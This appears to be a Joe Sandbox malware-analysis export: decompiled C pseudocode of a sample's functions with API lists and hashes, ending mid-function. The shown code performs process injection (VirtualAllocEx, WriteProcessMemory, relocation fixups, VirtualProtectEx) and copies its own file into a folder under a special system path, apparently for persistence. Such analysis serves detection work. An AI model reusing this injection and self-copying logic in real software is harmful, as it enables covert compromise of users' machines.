                          									__eflags = _t362;
                          									if(_t362 == 0) {
                          										L55:
                          										_t490 = _t496 + 0x14;
                          										__eflags = _t490;
                          										_t434 =  &_v184;
                          										_v264 = _t490;
                          										continue;
                          									} else {
                          										_t497 =  &_v164;
                          										while(1) {
                          											__eflags = _t362;
                          											if(__eflags < 0) {
                          												_t363 = _t362 & 0x0000ffff;
                          											} else {
                          												_t368 = E006E9E90(_t508, _t362);
                          												_v176 = _t368;
                          												_t363 = _t368 + 2;
                          											}
                          											_t364 = E006F3100(_t508, __eflags, _v184, _t363);
                          											__eflags = _t364;
                          											_v172 = _t364;
                          											if(__eflags == 0) {
                          												goto L21;
                          											}
                          											_v292 = 0;
                          											__eflags = WriteProcessMemory( *(_t508 + 0x70), _v176, _t497, 4,  &_v292);
                          											if(__eflags == 0) {
                          												goto L21;
                          											}
                          											__eflags = _v292 - 4;
                          											if(__eflags != 0) {
                          												goto L21;
                          											}
                          											_t367 = _v180;
                          											_v180 = _t367 + 4;
                          											_v176 = _v176 + 4;
                          											_t362 =  *(_t367 + 4);
                          											__eflags = _t362;
                          											if(_t362 != 0) {
                          												continue;
                          											}
                          											_t496 = _v264;
                          											goto L55;
                          										}
                          										goto L21;
                          									}
                          								}
                          								goto L21;
                          							}
                          						}
                          						_t369 = E006E9E90(_t508,  *((intOrPtr*)(_t471 + 0xa0)));
                          						__eflags = _t369;
                          						_v272 = _t369;
                          						if(_t369 == 0) {
                          							goto L41;
                          						}
                          						__eflags =  *_t369;
                          						if( *_t369 != 0) {
                          							do {
                          								_t370 = _t369 + 8;
                          								_t480 =  &_v200;
                          								_t448 =  *((intOrPtr*)(_t369 + 4)) + 0xfffffff8 >> 1;
                          								__eflags = _t448;
                          								_v204 = _t448;
                          								 *((intOrPtr*)(_t480 + 8)) = 0;
                          								 *_t480 = 0;
                          								 *((intOrPtr*)(_t480 + 0xc)) = 0;
                          								 *((intOrPtr*)(_t480 + 4)) = 0;
                          								_v168 = _t370;
                          								if(_t448 == 0) {
                          									goto L40;
                          								} else {
                          									goto L32;
                          								}
                          								do {
                          									L32:
                          									_t499 =  *_t370 & 0x0000ffff;
                          									_t372 = _t499 >> 0xc;
                          									__eflags = _t372 - 0xa;
                          									if(_t372 == 0xa) {
                          										_t501 = (_t499 & 0x00000fff) +  *_v268;
                          										_v200 = _t501;
                          										_t374 = E006E9E90(_t508, _t501);
                          										asm("adc eax, 0x0");
                          										_v196 =  *_t374 + _v236;
                          										_v192 =  *(_t374 + 4);
                          										_v296 = 0;
                          										__eflags = WriteProcessMemory( *(_t508 + 0x70), _t501 + _v260,  &_v196, 8,  &_v296);
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags = _v292 - 8;
                          										if(__eflags != 0) {
                          											goto L21;
                          										}
                          										goto L39;
                          									}
                          									__eflags = _t372 - 3;
                          									if(_t372 != 3) {
                          										goto L39;
                          									}
                          									_t504 = (_t499 & 0x00000fff) +  *_v268;
                          									_v200 = _t504;
                          									_v200 = _v236 +  *((intOrPtr*)(E006E9E90(_t508, _t504)));
                          									_v296 = 0;
                          									__eflags = WriteProcessMemory( *(_t508 + 0x70), _t504 + _v260,  &_v200, 4,  &_v296);
                          									if(__eflags == 0) {
                          										goto L21;
                          									}
                          									__eflags = _v292 - 4;
                          									if(__eflags == 0) {
                          										goto L39;
                          									}
                          									goto L21;
                          									L39:
                          									_t370 =  &(_v168[1]);
                          									_v168 = _t370;
                          									_t156 =  &_v204;
                          									 *_t156 = _v204 - 1;
                          									__eflags =  *_t156;
                          								} while ( *_t156 != 0);
                          								L40:
                          								_t449 = _v268;
                          								_t481 =  *((intOrPtr*)(_t449 + 4));
                          								_t369 = _t481 + _t449;
                          								_v268 = _t369;
                          								__eflags =  *(_t481 + _t449);
                          							} while ( *(_t481 + _t449) != 0);
                          						}
                          						goto L41;
                          					} else {
                          						_t401 = 0;
                          						_v284 = 1;
                          						while(1) {
                          							_t483 =  >  ?  *((intOrPtr*)(_t316 + _t401 + 8)) :  *((intOrPtr*)(_t316 + _t401 + 0x10));
                          							_v240 = _t483;
                          							_t383 =  *((intOrPtr*)(_t316 + _t401 + 0xc));
                          							_v236 = _t383;
                          							_t385 = VirtualAllocEx( *(_t508 + 0x70), _t383 + _v256, _t483, 0x1000, 4);
                          							_v248 = _t385;
                          							if(_t385 == 0) {
                          								goto L21;
                          							}
                          							_v244 = E006E3180(_v240, _v244);
                          							_v288 = _t401;
                          							E006F6610(_t386, 0, _v240);
                          							_t514 = _t514 + 0x14;
                          							_t506 = _v240;
                          							_v292 = 0;
                          							_t404 = _v288;
                          							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _v244, _t506,  &_v292);
                          							if(__eflags == 0) {
                          								goto L21;
                          							}
                          							__eflags = _v292 - _t506;
                          							if(__eflags != 0) {
                          								goto L21;
                          							}
                          							_t390 = _v272;
                          							_t507 =  *(_t390 + _t404 + 0x10);
                          							__eflags = _t507;
                          							if(_t507 == 0) {
                          								L15:
                          								_t471 = _v276;
                          								_t464 = _v284;
                          								__eflags = _t464 - ( *(_t471 + 6) & 0x0000ffff);
                          								if(_t464 >= ( *(_t471 + 6) & 0x0000ffff)) {
                          									goto L27;
                          								} else {
                          									_t316 = _v272;
                          									_t401 = _t404 + 0x28;
                          									__eflags = _t401;
                          									_v284 = _t464 + 1;
                          									continue;
                          								}
                          							}
                          							_t467 =  *(_t508 + 0x60) +  *((intOrPtr*)(_t390 + _t404 + 0x14));
                          							_v292 = 0;
                          							_t404 = _v288;
                          							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _t467, _t507,  &_v292);
                          							if(__eflags == 0) {
                          								goto L21;
                          							}
                          							__eflags = _v292 - _t507;
                          							if(__eflags != 0) {
                          								goto L21;
                          							}
                          							goto L15;
                          						}
                          						goto L21;
                          					}
                          				}
                          			}

                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,00002000,00000040), ref: 006F099C
                          • VirtualAllocEx.KERNEL32(?,00000000,?,00001000,00000004), ref: 006F09C5
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?,?), ref: 006F0A59
                          • VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 006F0AC7
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 006F0B46
                          • WriteProcessMemory.KERNEL32(?,?,?,00000001,?), ref: 006F0B8D
                          • VirtualAllocEx.KERNEL32(?,?,?,00001000,00000004), ref: 006F0BEE
                          • GetLastError.KERNEL32 ref: 006F0C02
                          • VirtualAllocEx.KERNEL32(?,00000000,?,00002000,00000040), ref: 006F0C1E
                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,00000000,?), ref: 006F0D23
                          • WriteProcessMemory.KERNEL32(?,?,?,00000008,00000000,00000000,?), ref: 006F0D82
                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,00000000,?), ref: 006F0E77
                          • VirtualProtectEx.KERNEL32(?,00000000,?,00000010,00000000,?,?,?,?), ref: 006F0FB0
                          • lstrcmp.KERNEL32(?,?), ref: 006F1157
                          • lstrcmp.KERNEL32(?,?), ref: 006F1174
                          • lstrcmp.KERNEL32(?,?), ref: 006F1191
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: MemoryProcessVirtualWrite$Alloc$lstrcmp$Protect$ErrorLast
                          • String ID:
                          • API String ID: 4278583544-0
                          • Opcode ID: 4ee791f2a5bc95521b3879a4f99f7e9d626f2d7af49aa0a8ac43a41e11b67dd5
                          • Instruction ID: f4bd8550ddabc2b7f1f6ce3864521f6c2362bd0328109173a99f6deeda7ecf31
                          • Opcode Fuzzy Hash: 4ee791f2a5bc95521b3879a4f99f7e9d626f2d7af49aa0a8ac43a41e11b67dd5
                          • Instruction Fuzzy Hash: CA422470608705EFE724CF25C894B6BBBE6BF89704F14892DE68987352DB30E845CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E006E3EC0(void* __edx, void* __eflags) {
                          				void* __edi;
                          				intOrPtr _t82;
                          				intOrPtr _t83;
                          				WCHAR* _t84;
                          				intOrPtr _t85;
                          				intOrPtr _t86;
                          				void* _t87;
                          				WCHAR* _t94;
                          				void* _t96;
                          				signed int _t99;
                          				signed short* _t106;
                          				int* _t107;
                          				signed short* _t109;
                          				signed short* _t110;
                          				signed short* _t113;
                          				intOrPtr _t122;
                          				signed int _t125;
                          				WCHAR* _t132;
                          				short* _t133;
                          				WCHAR* _t135;
                          				void* _t137;
                          				void* _t138;
                          				void* _t139;
                          				signed int _t140;
                          				signed short** _t141;
                          				void* _t143;
                          				void* _t144;
                          				signed short* _t149;
                          				signed short _t150;
                          				signed int _t157;
                          				signed int _t159;
                          				intOrPtr* _t162;
                          				intOrPtr _t169;
                          				WCHAR* _t170;
                          				signed int _t171;
                          				intOrPtr* _t172;
                          				signed int _t173;
                          				intOrPtr _t174;
                          				signed int* _t175;
                          				void* _t177;
                          				void* _t178;
                          				void* _t179;
                          				WCHAR** _t183;
                          				signed short* _t184;
                          				signed short** _t185;
                          				void* _t186;
                          				void* _t187;
                          				intOrPtr* _t188;
                          				intOrPtr* _t189;
                          				void* _t190;
                          				void* _t191;
                          				intOrPtr* _t192;
                          				void* _t193;
                          				short _t218;
                          
                          				_t169 =  *((intOrPtr*)(_t186 + 0x464));
                          				_t137 = _t186 + 0x18;
                          				_t171 = 0;
                          				 *((intOrPtr*)(_t186 + 0xc)) = 0;
                          				 *((intOrPtr*)(_t186 + 4)) = 0;
                          				 *((intOrPtr*)(_t186 + 0x14)) = 0;
                          				E006F43C0(_t137, __edx, __eflags);
                          				if(_t169 == 0) {
                          					L3:
                          					_t172 = _t186 + 4;
                          					E006EAE30(_t172, _t186 + 8);
                          					_t187 = _t186 + 8;
                          					_t82 =  *_t172;
                          				} else {
                          					while( *((short*)(_t169 + _t171 * 2)) != 0) {
                          						_t171 = _t171 + 1;
                          						if(_t171 != 0x800) {
                          							continue;
                          						} else {
                          							goto L3;
                          						}
                          						goto L5;
                          					}
                          					_t82 = E006EB7A0(_t169);
                          					_t187 = _t186 + 4;
                          					 *((intOrPtr*)(_t187 + 4)) = _t82;
                          					 *(_t187 + 8) = _t171;
                          				}
                          				L5:
                          				_t83 = E006EB7A0(_t82);
                          				_t188 = _t187 + 4;
                          				_t173 =  *(_t188 + 8);
                          				 *_t188 = _t83;
                          				_t184 = _t83 + _t173 * 2;
                          				_t84 = E006EB7A0( *((intOrPtr*)(_t188 + 4)));
                          				_t189 = _t188 + 4;
                          				_t170 = _t84;
                          				if(_t173 <= 0) {
                          					_t174 =  *_t189;
                          				} else {
                          					_t174 =  *_t189;
                          					while(( *_t184 & 0x0000ffff) != 0x5c) {
                          						_t184 =  &(_t184[0xffffffffffffffff]);
                          						if(_t184 > _t174) {
                          							continue;
                          						} else {
                          						}
                          						goto L12;
                          					}
                          					 *_t184 = 0;
                          					_t184 =  &(_t184[1]);
                          					__eflags = _t184;
                          				}
                          				L12:
                          				_t85 = E006EB7A0(_t174);
                          				_t190 = _t189 + 4;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x468)))) = _t85;
                          				_t86 = E006EB7A0( *((intOrPtr*)(_t190 + 4)));
                          				_t191 = _t190 + 4;
                          				_t147 =  *((intOrPtr*)(_t191 + 0x46c));
                          				 *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x46c)))) = _t86;
                          				_push(_t137);
                          				_push(_t174);
                          				_t87 = E006EC7C0();
                          				_t192 = _t191 + 8;
                          				_t138 = 0;
                          				if(_t87 == 0) {
                          					if( *0x6f9ae8 == 0) {
                          						_t94 =  *(_t192 + 0xc);
                          					} else {
                          						_t183 = _t192 + 0xc;
                          						_push(_t183);
                          						E006E8CD0(_t147);
                          						_t192 = _t192 + 4;
                          						_t94 =  *_t183;
                          						if(_t94 != 0) {
                          							_t174 =  *_t192;
                          						} else {
                          							_t174 =  *_t192;
                          							if( *((intOrPtr*)(_t192 + 8)) != 0) {
                          								_t159 =  *_t170 & 0x0000ffff;
                          								_t132 = _t170;
                          								if(_t159 != 0) {
                          									_t135 = _t170;
                          									do {
                          										if((_t159 - 0x00000041 & 0x0000ffff) <= 0x19) {
                          											 *_t135 = _t159 + 0x20;
                          										}
                          										_t159 = _t135[1] & 0x0000ffff;
                          										_t135 =  &(_t135[1]);
                          									} while (_t159 != 0);
                          								}
                          								_t133 =  &(_t132[0xfffffffffffffffa]);
                          								while(_t133 > _t170) {
                          									__eflags =  *_t133 - 0x790073;
                          									if( *_t133 != 0x790073) {
                          										L25:
                          										_t133 =  &(_t133[0xffffffffffffffff]);
                          										__eflags = _t133;
                          										continue;
                          									} else {
                          										__eflags = _t133[2] - 0x740073;
                          										if(_t133[2] != 0x740073) {
                          											goto L25;
                          										} else {
                          											__eflags = _t133[4] - 0x6d0065;
                          											if(_t133[4] == 0x6d0065) {
                          												L28:
                          												 *(_t192 + 0xc) = 0xffffffff;
                          												_t94 = 0xffffffffffffffff;
                          											} else {
                          												goto L25;
                          											}
                          										}
                          									}
                          									goto L31;
                          								}
                          								_t94 = 0;
                          								if( *((intOrPtr*)(_t192 + 8)) <= 0x11) {
                          									goto L28;
                          								}
                          							}
                          						}
                          					}
                          					L31:
                          					_t162 =  *0x6f9de4;
                          					_t149 = 0;
                          					_t139 = _t192 + 0x40;
                          					 *(_t192 + 0x10) = 0;
                          					while(1) {
                          						L33:
                          						_push(_t139);
                          						_push(_t149);
                          						_push(_t94);
                          						_push(0x1a);
                          						_push(_t149);
                          						if( *_t162() >= 0) {
                          							goto L35;
                          						}
                          						_t138 = 0;
                          						_push(_t192 + 0x40);
                          						_push(0);
                          						_push(0xffffffff);
                          						_push(0x1a);
                          						_push(0);
                          						if( *0x6f9de4() >= 0) {
                          							goto L35;
                          						}
                          						goto L74;
                          						L35:
                          						_t96 =  *(_t192 + 0xc);
                          						if(_t96 != 0) {
                          							CloseHandle(_t96);
                          						}
                          						if( *(_t192 + 0x40) == 0) {
                          							_t140 = 0;
                          							__eflags = 0;
                          							_t175 = _t192 + 0x40;
                          						} else {
                          							_t144 = 0;
                          							_t178 = _t192 + 0x40;
                          							do {
                          								_t144 = _t144 + 1;
                          								_t218 =  *((short*)(_t178 + 2));
                          								_t178 = _t178 + 2;
                          							} while (_t218 != 0);
                          						}
                          						if(_t140 >=  *((intOrPtr*)(_t192 + 8))) {
                          							L44:
                          							E006F4520(_t192 + 0x24c, 0x4d);
                          							_t193 = _t192 + 8;
                          							_t99 =  *(_t193 + 0x248) & 0x0000ffff;
                          							 *_t175 = _t99;
                          							if(_t99 != 0) {
                          								_t125 = 0;
                          								do {
                          									_t157 =  *(_t193 + 0x24a + _t125 * 2) & 0x0000ffff;
                          									 *(_t175 + 2 + _t125 * 2) = _t157;
                          									_t125 = _t125 + 1;
                          								} while (_t157 != 0);
                          								_t140 = _t140 + _t125;
                          							}
                          							CreateDirectoryW(_t193 + 0x44, 0);
                          							_t170 = E006E3180(_t140 + _t140 + 0x208, _t170);
                          							E006EC400(_t170, _t193 + 0x44, _t140 + _t140 + 2);
                          							_t192 = _t193 + 0x14;
                          							_t58 = _t140 * 2; // 0xa
                          							_t106 = _t170 + _t58 + 0xa;
                          							 *((intOrPtr*)(_t106 - 0xa)) = 0x5c;
                          							while(1) {
                          								_t150 =  *_t184 & 0x0000ffff;
                          								if(_t150 == 0) {
                          									break;
                          								}
                          								if((_t150 & 0x0000ffff) != 0x2e) {
                          									_t143 = _t150 + 2;
                          									__eflags = (_t150 - 0x00000049 & 0x0000ffff) - 0xe;
                          									_t154 =  <  ? _t143 : _t150;
                          									__eflags = (_t150 - 0x00000035 & 0x0000ffff) - 3;
                          									_t155 =  <  ? _t143 :  <  ? _t143 : _t150;
                          									__eflags = (_t150 - 0x0000006b & 0x0000ffff) - 9;
                          									_t156 =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
                          									_t184 =  &(_t184[1]);
                          									 *((short*)(_t106 - 8)) =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
                          									_t106 =  &(_t106[1]);
                          									__eflags = _t106;
                          									continue;
                          								} else {
                          									 *((intOrPtr*)(_t106 - 8)) = 0x65002e;
                          									 *((intOrPtr*)(_t106 - 4)) = 0x650078;
                          								}
                          								L54:
                          								_t177 = 0xfffffffd;
                          								_t139 = _t192 + 0x40;
                          								 *_t107 = 0;
                          								while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
                          									SleepEx(0x3e8, 0);
                          									_t177 = _t177 + 1;
                          									if(_t177 != 0) {
                          										continue;
                          									} else {
                          										if( *((intOrPtr*)( *0x6f9c88)) == 0) {
                          											L67:
                          											if( *(_t192 + 0x10) == 0) {
                          												_t174 =  *_t192;
                          												_t162 =  *0x6f9de4;
                          												 *(_t192 + 0xc) = 0xffffffff;
                          												_t94 = 0xffffffffffffffff;
                          												 *(_t192 + 0x10) = 1;
                          												_t149 = 0;
                          												__eflags = 0;
                          												goto L33;
                          											} else {
                          												goto L68;
                          											}
                          										} else {
                          											_push(_t192 + 0x14);
                          											if( *0x6f9c88() == 0) {
                          												goto L67;
                          											} else {
                          												_t179 = 3;
                          												while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
                          													SleepEx(0x3e8, 0);
                          													_t179 = _t179 - 1;
                          													if(_t179 != 0) {
                          														continue;
                          													} else {
                          														_t179 = 0;
                          													}
                          													break;
                          												}
                          												_t122 =  *((intOrPtr*)(_t192 + 0x14));
                          												if(_t122 != 0 &&  *((intOrPtr*)( *0x6f9c78)) != 0) {
                          													 *0x6f9c78(_t122);
                          												}
                          												if(_t179 != 0) {
                          													break;
                          												} else {
                          													goto L67;
                          												}
                          											}
                          										}
                          									}
                          									goto L74;
                          								}
                          								_t185 =  *(_t192 + 0x468);
                          								_t109 =  *_t185;
                          								__eflags = _t109;
                          								if(_t109 != 0) {
                          									E006E91E0(_t109);
                          									_t192 = _t192 + 4;
                          								}
                          								_t141 =  *(_t192 + 0x46c);
                          								_t174 =  *_t192;
                          								_t110 =  *_t141;
                          								__eflags = _t110;
                          								if(_t110 != 0) {
                          									E006E91E0(_t110);
                          									_t192 = _t192 + 4;
                          								}
                          								 *_t185 = E006EB7A0(_t192 + 0x40);
                          								_t113 = E006EB7A0(_t170);
                          								_t192 = _t192 + 8;
                          								 *_t141 = _t113;
                          								_t138 = 1;
                          								__eflags = 1;
                          								goto L74;
                          							}
                          							_t107 =  &(_t106[0xfffffffffffffffc]);
                          							__eflags = _t107;
                          							goto L54;
                          						} else {
                          							_t170[_t140] = 0;
                          							if(lstrcmpiW(_t170, _t192 + 0x40) == 0) {
                          								L68:
                          								_t174 =  *_t192;
                          								_t138 = 0;
                          							} else {
                          								goto L44;
                          							}
                          						}
                          						goto L74;
                          					}
                          				}
                          				L74:
                          				_t88 =  *((intOrPtr*)(_t192 + 4));
                          				if( *((intOrPtr*)(_t192 + 4)) != 0) {
                          					E006E91E0(_t88);
                          					_t192 = _t192 + 4;
                          				}
                          				if(_t174 != 0) {
                          					E006E91E0(_t174);
                          					_t192 = _t192 + 4;
                          				}
                          				if(_t170 != 0) {
                          					E006E91E0(_t170);
                          					_t192 = _t192 + 4;
                          				}
                          				E006F16C0(_t192 + 0x18, _t170);
                          				return _t138;
                          			}

                          APIs
                            • Part of subcall function 006F43C0: InitializeCriticalSectionAndSpinCount.KERNEL32(006F9BBC,00000800,002FD120,?,00000000,?,006E962D,?,?,?,?,?,00000000,002FD120,00000000,?), ref: 006F43F6
                          • SHGetFolderPathW.SHELL32(00000000,0000001A,000000FF,00000000,?), ref: 006E408D
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 006E40A4
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 006E40DD
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 006E412F
                          • CopyFileW.KERNEL32(?,00000000,00000000), ref: 006E41CF
                          • SleepEx.KERNEL32(000003E8,00000000), ref: 006E41E4
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 006E41FC
                          • CopyFileW.KERNEL32(?,00000000,00000000), ref: 006E4212
                          • SleepEx.KERNEL32(000003E8,00000000), ref: 006E4223
                          • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 006E4242
                            • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Wow64$CopyFileRedirectionSleep$CloseCountCreateCriticalDirectoryDisableFolderFreeHandleHeapInitializePathRevertSectionSpinlstrcmpi
                          • String ID:
                          • API String ID: 1225154383-0
                          • Opcode ID: 30a262e4c374b776f57ede8c47a8e38df9f701d6c41a292b43bcee1ad8a4618a
                          • Instruction ID: 89a69b151e67908fa13f07f30c8ca2dcc5af6a806546d68c867ea50dc6daf293
                          • Opcode Fuzzy Hash: 30a262e4c374b776f57ede8c47a8e38df9f701d6c41a292b43bcee1ad8a4618a
                          • Instruction Fuzzy Hash: 4EC1F3B19053919BDB209F26DC88BAB73E6EF80314F04452CF98587390EB31DA45CBA2
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E006F1A70(intOrPtr __ecx) {
                          				signed int _t166;
                          				signed int _t167;
                          				signed int _t168;
                          				signed int _t169;
                          				signed int _t170;
                          				void* _t171;
                          				signed int _t172;
                          				void* _t177;
                          				signed int _t178;
                          				int _t194;
                          				WCHAR** _t202;
                          				WCHAR** _t207;
                          				signed int _t212;
                          				intOrPtr _t216;
                          				int _t222;
                          				signed int _t224;
                          				void* _t241;
                          				signed int _t243;
                          				signed int _t245;
                          				signed int _t246;
                          				intOrPtr _t251;
                          				void* _t256;
                          				signed int _t258;
                          				signed int _t261;
                          				signed int _t262;
                          				signed int _t265;
                          				signed int _t269;
                          				signed int _t271;
                          				intOrPtr _t277;
                          				void* _t279;
                          				signed int _t281;
                          				signed int _t282;
                          				signed int _t283;
                          				intOrPtr _t284;
                          				void* _t286;
                          				signed int _t287;
                          				WCHAR* _t288;
                          				signed int _t289;
                          				void* _t290;
                          				WCHAR* _t292;
                          				WCHAR** _t293;
                          				signed int _t295;
                          				intOrPtr _t298;
                          				void* _t299;
                          				signed int _t300;
                          				intOrPtr* _t301;
                          				intOrPtr* _t303;
                          
                          				if( *((intOrPtr*)(__ecx)) <= 0) {
                          					L79:
                          					return 1;
                          				} else {
                          					_t166 = 1;
                          					_t286 = 0;
                          					_t243 = 0;
                          					 *_t303 = __ecx;
                          					do {
                          						 *(_t303 + 0x10) = _t243;
                          						if((_t166 & 0x00000001) == 0) {
                          							_t167 =  *_t286;
                          							__eflags = _t167;
                          							if(_t167 != 0) {
                          								E006E91E0(_t167);
                          								_t303 = _t303 + 4;
                          							}
                          							_t168 =  *(_t286 + 4);
                          							__eflags = _t168;
                          							if(_t168 != 0) {
                          								E006E91E0(_t168);
                          								_t303 = _t303 + 4;
                          							}
                          							_t169 =  *(_t286 + 8);
                          							__eflags = _t169;
                          							if(_t169 != 0) {
                          								E006E91E0(_t169);
                          								_t303 = _t303 + 4;
                          							}
                          							_t170 =  *(_t286 + 0x10);
                          							__eflags = _t170;
                          							if(_t170 != 0) {
                          								E006E91E0(_t170);
                          								_t303 = _t303 + 4;
                          							}
                          							_t171 = _t286;
                          							_t31 = _t286 + 4; // 0x4
                          							_t287 = _t286 + 8;
                          							_t33 = _t171 + 0x10; // 0x10
                          							_t34 = _t171 + 0xc; // 0xc
                          							_t290 = _t34;
                          							_t299 = _t171;
                          							_t172 =  *(_t171 + 0xc);
                          							 *(_t303 + 4) = _t31;
                          							 *(_t303 + 0xc) = _t33;
                          							__eflags = _t172;
                          							if(_t172 != 0) {
                          								E006E91E0(_t172);
                          								_t303 = _t303 + 4;
                          							}
                          							_t245 = _t287;
                          							_t286 = _t299;
                          						} else {
                          							_t241 = E006E3180(0x1c, 0);
                          							_t303 = _t303 + 8;
                          							_t286 = _t241;
                          							_t22 = _t241 + 0xc; // 0xc
                          							_t290 = _t22;
                          							_t24 = _t286 + 4; // 0x4
                          							 *(_t303 + 0xc) = _t241 + 0x10;
                          							_t26 = _t286 + 8; // 0x8
                          							_t245 = _t26;
                          							 *(_t303 + 4) = _t24;
                          						}
                          						_t277 =  *_t303;
                          						_t300 =  *(_t303 + 0x10);
                          						 *((intOrPtr*)(_t286 + 0x18)) = 0;
                          						 *((intOrPtr*)(_t286 + 0x14)) = 0;
                          						 *(_t286 + 0x10) = 0;
                          						 *((intOrPtr*)(_t286 + 0xc)) = 0;
                          						 *(_t286 + 8) = 0;
                          						 *(_t286 + 4) = 0;
                          						 *_t286 = 0;
                          						_t48 = _t286 + 0x14; // 0x14
                          						 *(_t303 + 0x14) = _t245;
                          						_t177 = E006EB3F0( *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4)),  *(_t303 + 0x14), _t245,  *(_t303 + 0x14), _t48, _t290);
                          						_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4));
                          						if(_t177 == 0) {
                          							_t178 = E006E22A0(_t251);
                          							__eflags = _t178;
                          							if(_t178 == 0) {
                          								_t301 =  *_t303;
                          								_t246 =  *(_t303 + 0x10);
                          								_push( *( *(_t301 + 4) + _t246 * 4));
                          								_t178 = E006F3360();
                          								__eflags = _t178;
                          								 *_t286 = _t178;
                          								if(_t178 != 0) {
                          									_push(_t286);
                          									_t178 = E006F4EA0(_t301);
                          								}
                          								goto L66;
                          							}
                          							_t246 =  *(_t303 + 0x10);
                          							goto L33;
                          						} else {
                          							_push(_t251);
                          							_t178 = E006F3360();
                          							_t292 = _t303 + 0x1c;
                          							 *(_t303 + 0xc) = _t286;
                          							 *_t286 = _t178;
                          							if(_t178 == 0) {
                          								_t246 =  *(_t303 + 0x10);
                          								_t301 =  *_t303;
                          								_t286 =  *(_t303 + 0xc);
                          								goto L66;
                          							}
                          							_t288 = _t292;
                          							E006F4520(_t292, 0x96);
                          							_t303 = _t303 + 8;
                          							_t293 =  *(_t303 + 8);
                          							if(lstrcmpiW( *_t293, _t292) == 0) {
                          								_t301 =  *_t303;
                          								_t286 =  *(_t303 + 0xc);
                          								_push(_t286);
                          								_t178 = E006E4C20(_t301);
                          								_t246 =  *(_t303 + 0x10);
                          								goto L66;
                          							}
                          							E006F4520(_t288, 0x97);
                          							_t303 = _t303 + 8;
                          							_t194 = lstrcmpiW( *_t293, _t288);
                          							_t246 =  *(_t303 + 0x10);
                          							_t286 =  *(_t303 + 0xc);
                          							if(_t194 == 0) {
                          								_t301 =  *_t303;
                          								_push(_t286);
                          								E006F4EA0(_t301);
                          								__eflags = _t246;
                          								_t178 = 0 | _t246 > 0x00000000;
                          								_t246 = _t246 - _t178;
                          								goto L66;
                          							}
                          							E006F4520(_t303 + 0x20, 0x98);
                          							_t303 = _t303 + 8;
                          							if(lstrcmpiW( *_t293, _t303 + 0x1c) == 0) {
                          								_t178 =  *( *(_t303 + 8));
                          								__eflags = _t178;
                          								if(_t178 == 0) {
                          									L33:
                          									_t301 =  *_t303;
                          									goto L66;
                          								}
                          								__eflags =  *_t178;
                          								if( *_t178 == 0) {
                          									goto L33;
                          								}
                          								_t301 =  *_t303;
                          								_t279 = 1;
                          								__eflags = 1;
                          								while(1) {
                          									_t91 = _t279 + 1; // 0x2
                          									_t256 = _t91;
                          									__eflags = _t279 - 0x1ff;
                          									if(_t279 > 0x1ff) {
                          										break;
                          									}
                          									__eflags =  *(_t178 + _t279);
                          									_t279 = _t256;
                          									if(__eflags != 0) {
                          										continue;
                          									}
                          									break;
                          								}
                          								_t93 = _t256 - 2; // 0x0
                          								__eflags = _t93 - 0x1fe;
                          								if(_t93 > 0x1fe) {
                          									goto L66;
                          								}
                          								_t202 = E006E7400(_t178, _t256 - 1);
                          								_t303 = _t303 + 8;
                          								 *(_t303 + 8) = _t202;
                          								_t178 =  *( *(_t301 + 4) + _t246 * 4);
                          								_t258 =  *(_t178 + 0x58);
                          								 *(_t303 + 0x14) = _t178;
                          								__eflags = _t258;
                          								if(_t258 <= 0) {
                          									_t281 = 0;
                          									__eflags = 0;
                          									L3:
                          									__eflags = _t281 - _t258;
                          									if(_t281 != _t258) {
                          										goto L66;
                          									}
                          									_t178 = E006E3180(8 + _t258 * 8,  *((intOrPtr*)( *(_t303 + 0x14) + 0x54)));
                          									_t303 = _t303 + 8;
                          									_t282 = 0;
                          									__eflags = _t178;
                          									if(_t178 != 0) {
                          										_t269 =  *(_t301 + 4);
                          										_t284 =  *((intOrPtr*)(_t269 + _t246 * 4));
                          										 *(_t303 + 0x14) = _t269;
                          										 *(_t178 +  *(_t284 + 0x58) * 4) =  *(_t303 + 8);
                          										 *(_t284 + 0x54) = _t178;
                          										_t282 = 0;
                          										_t178 =  *( *(_t303 + 0x14) + _t246 * 4);
                          										_t17 = _t178 + 0x58;
